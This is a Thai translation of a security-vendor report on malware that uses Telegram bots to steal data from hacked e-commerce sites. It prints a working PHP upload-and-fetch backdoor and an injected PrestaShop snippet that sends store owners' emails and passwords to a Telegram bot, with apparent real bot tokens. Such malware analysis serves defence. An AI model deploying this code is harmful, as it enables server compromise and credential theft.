Computer >> คอมพิวเตอร์ >  >> ระบบเครือข่าย >> ความปลอดภัยของเครือข่าย

แฮกเกอร์ใช้ประโยชน์จากโทรเลขเพื่อควบคุมมัลแวร์ที่ใช้ในการแพร่ระบาดเว็บไซต์อีคอมเมิร์ซ – Astra Security Report

เมื่อเร็วๆ นี้ วิศวกรด้านความปลอดภัยของเราได้พบเห็นแคมเปญมัลแวร์โทรเลขที่กำลังดำเนินอยู่ในป่า โดยที่แฮกเกอร์ใช้ประโยชน์จากบริการส่งข้อความที่เข้ารหัสอย่าง "โทรเลข" เพื่อรับบันทึกข้อผิดพลาดจากแคมเปญมัลแวร์ ตลอดจนข้อมูลที่ละเอียดอ่อนจากเว็บไซต์ที่ถูกแฮ็ก

บันทึกข้อผิดพลาดหรือข้อมูลที่ละเอียดอ่อนที่ถูกส่งไปยังแฮ็กเกอร์ผ่าน Telegram คือการตรวจสอบว่ามัลแวร์ของพวกเขาถูกปลูกบนเว็บไซต์สำเร็จหรือไม่และในกรณีอื่นหากมัลแวร์ได้รับการปลูกฝังสำเร็จแล้วพวกเขาจะส่งข้อมูลที่สำคัญของ เหยื่อไปยังหมายเลขโทรเลขหรือช่องเฉพาะ ร้านค้า Magento, Prestashop และ WooCommerce ยังคงเป็นเป้าหมายสูงสุดของแคมเปญการแฮ็กนี้

ไซต์จำนวนมากกำลังถูกกำหนดเป้าหมาย

ในฐานะผู้ให้บริการด้านความปลอดภัย เราเฝ้าติดตามภัยคุกคามทางไซเบอร์และแคมเปญมัลแวร์ล่าสุดอย่างต่อเนื่องที่ขัดขวางธุรกิจในแต่ละวัน ในแคมเปญมัลแวร์โทรเลขนี้ เราพบว่า Magneto, Prestashop, WooCommerce และ CMS อื่นๆ ตกเป็นเป้าหมายจำนวนมาก

โดยปกติ เมื่อแฮกเกอร์เจาะเข้าไปในเว็บไซต์และเก็บข้อมูลบัตรเครดิตหรือข้อมูลที่ละเอียดอ่อนอื่น ๆ พวกเขาจะทำการเรียก API ไปยังเซิร์ฟเวอร์ของตนหรือส่งข้อมูลไปยังอีเมล

แต่ในกรณีนี้ แทนที่จะทำการเรียก API หรือส่งข้อมูลที่ถูกขโมยไปยังที่อยู่อีเมลเฉพาะ ผู้คุกคามกำลังส่งผ่าน API ของ Telegram ไปยังหมายเลขโทรเลข / ID / ช่อง นี่คือการ หลบเลี่ยงการติดตามของ IP เซิร์ฟเวอร์ หรือเป็น ติดแบล็คลิสต์ และรับบันทึกข้อผิดพลาดหรือข้อมูลที่ถูกแฮ็กผ่านสื่อของ Telegram ที่ปลอดภัย

แฮกเกอร์รวบรวมบันทึกข้อผิดพลาดของมัลแวร์จากเว็บไซต์ Magento

ในระหว่างการวิเคราะห์แคมเปญมัลแวร์โทรเลขนี้ ทีมวิจัยของเรานำโดย Ananda Krishna พบว่าแฮกเกอร์กำลังฝังเชลล์สคริปต์ลงในไซต์ที่ใช้ Magento เพื่ออัปโหลดไฟล์ที่ไม่จำกัดหรือขโมยข้อมูลที่ละเอียดอ่อน หากเกิดข้อผิดพลาดใด ๆ ระหว่างกระบวนการปลูกมัลแวร์ ข้อผิดพลาดนั้นจะถูกส่งไปยังหมายเลขโทรเลข/ช่องสัญญาณของแฮ็กเกอร์เพื่อทำการดีบั๊ก

บล็อกที่เกี่ยวข้อง – การแก้ไขร้าน Magento ที่ถูกแฮ็ก

หลังจากการตรวจสอบเพิ่มเติม นักวิจัยของเราพบว่าแฮกเกอร์ได้สร้างแบ็คดอร์ที่เป็นอันตรายในเว็บไซต์ ซึ่งอนุญาตให้สร้างและรันโค้ดไฟล์ได้ แฮ็กเกอร์สามารถส่ง URL ใดก็ได้ไปยังสคริปต์ลับๆ ซึ่งจะดาวน์โหลดไฟล์จาก URL และบันทึกไว้ในเซิร์ฟเวอร์ที่ถูกบุกรุก ในทุกขั้นตอนของกระบวนการนี้ หรือในกรณีที่เกิดข้อผิดพลาด สคริปต์ลับๆ นี้จะส่งการอัปเดตแบบเรียลไทม์ไปยังแฮ็กเกอร์ผ่านข้อความโทรเลข

แฮกเกอร์ส่งชื่อไฟล์ที่เป็นอันตรายใน $_POST[‘name’] ตัวแปรและ URL ของไฟล์ที่เป็นอันตรายใน $_POST[‘content’] ตัวแปร

ต่อไปนี้คือตัวอย่างสคริปต์ที่เป็นอันตราย (ตามที่เครื่องสแกนมัลแวร์กำหนดสถานะ) ที่เราพบในไซต์ที่ถูกบุกรุกที่เราสแกน:

แฮกเกอร์ใช้ประโยชน์จากโทรเลขเพื่อควบคุมมัลแวร์ที่ใช้ในการแพร่ระบาดเว็บไซต์อีคอมเมิร์ซ – Astra Security Report

แฮกเกอร์ส่งคำขอด้วย $_POST[‘name’] =  evil.php  and $_POST[‘content’] = example.com/moreMaliciousCode.txt . สคริปต์ลับๆ จะสร้างไฟล์ชื่อ evil.php บนเซิร์ฟเวอร์โดยมีเนื้อหาไฟล์อยู่ใน example.com/moreMaliciousCode.txt. จากนั้นแฮ็กเกอร์ก็ไปที่ compromised-site.com/evil.php เพื่อรันโค้ดที่ไม่ถูกต้อง


ในบางไซต์ เราพบว่าแฮ็กเกอร์ใช้สคริปต์ลับๆ นี้เพื่อสร้างสคริปต์ "ตัวจัดการไฟล์" หรือเครื่องมือการดูแลฐานข้อมูล เช่น "ผู้ดูแลระบบ" เครื่องมือดังกล่าวช่วยให้พวกเขาดู/แก้ไข/ลบไฟล์ทั้งหมดบนเซิร์ฟเวอร์ของคุณ และยังสามารถเข้าถึงฐานข้อมูลของเว็บไซต์ได้อย่างเต็มที่ ซึ่งจะมีข้อมูลส่วนบุคคลที่สามารถระบุตัวตนได้ (PII) ที่ละเอียดอ่อน เช่น รหัสผ่าน ที่อยู่อีเมล หมายเลขบัตรเครดิต ฯลฯ

ตัวอย่างโค้ดที่เป็นอันตราย:

<?php
 try{
 if($_POST['action']=="wp_ajax_try_2020_v2"){
 if(!empty ($_FILES['file']) and md5(md5(md5($_POST['token_admin'])))=="7ccda4acaa2341a049350d96fe88393b"){
 if(function_exists("move_uploaded_file")){
 @move_uploaded_file($_FILES['file']['tmp_name'],"../".$_FILES['file']['name']);
 echo " file name : ".$_FILES['file']['name'];
 }else{
 die("no move_upload_file");
 } 
 }else{
 die(0);
 } 
 exit();
 }
 if($_POST['action']=="wp_ajax_try_2020_v3"){
 if(!empty ($_POST['content']) and md5(md5(md5($_POST['token_admin'])))=="7ccda4acaa2341a049350d96fe88393b"){
 if(function_exists("file_get_contents")){
 $html=file_get_contents($_POST['content']);
 $save=fopen($_POST['name'],"w");
 fwrite($save,$html);
 fclose($save);
 }else{
 die("no file_get_contents");
 } 
 }else{
 die(0);
 } 
 exit();
 } 
 }catch (Exception $e) {
 if(function_exists("file_get_contents")){
 try{
 file_get_contents("https://api.telegram.org/bot1234572065:AAGxojnCQEsIMuofDuQHaM-8wnM2VkYOMO4/sendMessage?chat_id=1110165405&text=" . urlencode($_SERVER['REMOTE_ADDR']." error wp")."" );
 file_get_contents("https://api.telegram.org/bot1234572065:AAGxojnCQEsIMuofDuQHaM-8wnM2VkYOMO4/sendMessage?chat_id=1110165405&text=" . urlencode($e)."" );
 }catch (Exception $e2) {}
 } 
 }
 ?>

แฮกเกอร์ขโมยข้อมูลจากเว็บไซต์ Prestashop

เช่นเดียวกับไซต์ Magento แฮกเกอร์ยังตั้งเป้าหมายที่ไซต์ Prestashop และใช้ประโยชน์จาก Telegram API เพื่อส่งข้อมูลที่ละเอียดอ่อนที่ถูกขโมยของเจ้าของไซต์ไปยังหมายเลข/ช่องทางของ Telegram

ในกรณีนี้ นักวิจัยของเราเห็นว่าแฮ็กเกอร์เลี่ยงผ่าน ฟังก์ชันที่ใช้เพื่อรับรายละเอียดลูกค้าทางอีเมล ใน classes/Customer.php และวางโค้ดที่เป็นอันตรายเพื่อส่งที่อยู่อีเมลและรหัสผ่านของเจ้าของไซต์ไปยังหมายเลข/ช่องโทรเลข

เชื่อว่ากลุ่มแฮ็กเกอร์มีชื่อว่า B4JAT4X (ดังที่กล่าวไว้ในตัวอย่างโค้ดด้านล่าง):

 if(isset($passwd)){
 $passwordbaja=$passwd;
 }elseif(isset($plaintextPassword)){
 $passwordbaja=$plaintextPassword;
 }
 $djskfhsdfdjknjksnfjksfds = "------+| [ B" . "4" . "J" . "A" . "T" . "4" . "X ] |+-----\n";
 $djskfhsdfdjknjksnfjksfds .= $email.":".$passwordbaja.":".$_SERVER['REMOTE_ADDR'].":".$_SERVER['SERVER_NAME']."\n";
 file_get_contents("https://"."ap"."i".".tel"."egr"."am".".org"."/bot1"."211"."998273".":AAHft2yajX"."qGoX3y_"."K3lfPernQ"."DPbtspu3g"."/sendMessa"."ge?chat_id="."11101654"."05&text=" .
 urlencode($djskfhsdfdjknjksnfjksfds)."" );

สิ่งนี้อาจทำให้เจ้าของเว็บไซต์ Prestashop ถูกขโมยข้อมูลลูกค้าที่ละเอียดอ่อนหากพวกเขาเก็บข้อมูลบัตรเครดิตของผู้ใช้บนเว็บไซต์ Prestashop แฮกเกอร์สามารถเข้าสู่ระบบเว็บไซต์ของเหยื่อโดยใช้รหัสผ่านของเขา/เธอและดูข้อมูลทั้งหมดได้

ความท้าทายด้านความปลอดภัยของเว็บ

ในขณะที่ภัยคุกคามทางไซเบอร์ขยายไปสู่การหยุดชะงักทางอินเทอร์เน็ตอีกขั้น แฮกเกอร์ก็กำลังค้นหาเทคนิคใหม่ๆ เช่นนี้เพื่อล้มล้างธุรกิจออนไลน์ หากบริษัทของคุณได้รับผลกระทบเนื่องจากการโจมตีทางไซเบอร์เช่นนี้ ก็อาจเกิดการละเมิด PII และการละเมิด GDPR ได้

เมื่อต้นเดือนนี้ Malwarebytes ได้ค้นพบ Web Skimmer ที่ขโมยข้อมูลเครดิตจากเว็บไซต์และส่งไปยังแฮ็กเกอร์ผ่านทาง Telegram messenger

เพื่อป้องกันเว็บไซต์ของคุณจากแคมเปญมัลแวร์โทรเลขนี้ ขอแนะนำให้บล็อกการเชื่อมต่อทั้งหมดไปยัง Telegram ที่ระดับเครือข่ายหรือใช้ไฟร์วอลล์ของเว็บแอปพลิเคชันซึ่งจะทำให้มั่นใจว่าไซต์ของคุณได้รับการปกป้องอย่างดีจากการโจมตีดังกล่าวและไม่อนุญาตให้แฮกเกอร์ขโมย ข้อมูลที่ละเอียดอ่อนของคุณ

หากคุณกำลังใช้ไฟร์วอลล์แอปพลิเคชันของ Astra แสดงว่าคุณได้รับการปกป้องจากการโจมตีนี้และการโจมตีทางไซเบอร์และช่องโหว่อื่นๆ เช่น SQLi, XSS, CSRF, LFI, RFI, การแฮ็กบัตรเครดิต, สแปม, บอทที่ไม่ดี ฯลฯ

นอกจากนี้ เครื่องสแกนมัลแวร์ที่ขับเคลื่อนด้วยแมชชีนเลิร์นนิงของ Astra ยังสามารถสแกนเว็บไซต์โดยอัตโนมัติเป็นประจำ และตั้งค่าสถานะองค์ประกอบและเหตุการณ์ต่างประเทศทั้งหมดในเว็บไซต์ ซึ่งรวมถึงการเพิ่มไฟล์ที่เป็นอันตรายใหม่หรือการแก้ไขไฟล์ที่มีอยู่ ด้วยคุณสมบัติ 'ดูความแตกต่างของไฟล์' ของเครื่องสแกนมัลแวร์ของ Astra คุณสามารถตรวจสอบการเปลี่ยนแปลงทั้งหมดจากภายในแดชบอร์ดและแม้กระทั่งลบไฟล์ที่เป็นอันตรายด้วยการคลิกปุ่มเพียงปุ่มเดียว

ผู้เชี่ยวชาญด้านความปลอดภัยแนะนำการสแกนมัลแวร์เป็นประจำว่าเป็นมาตรการรักษาความปลอดภัยที่สำคัญสำหรับความปลอดภัยของเว็บไซต์มาเป็นเวลานาน ถึงเวลาที่คุณต้องเตรียมเว็บไซต์ให้พร้อมด้วยมาตรการรักษาความปลอดภัยที่เหมาะสมเพื่อปกป้องเว็บไซต์ตลอดเวลา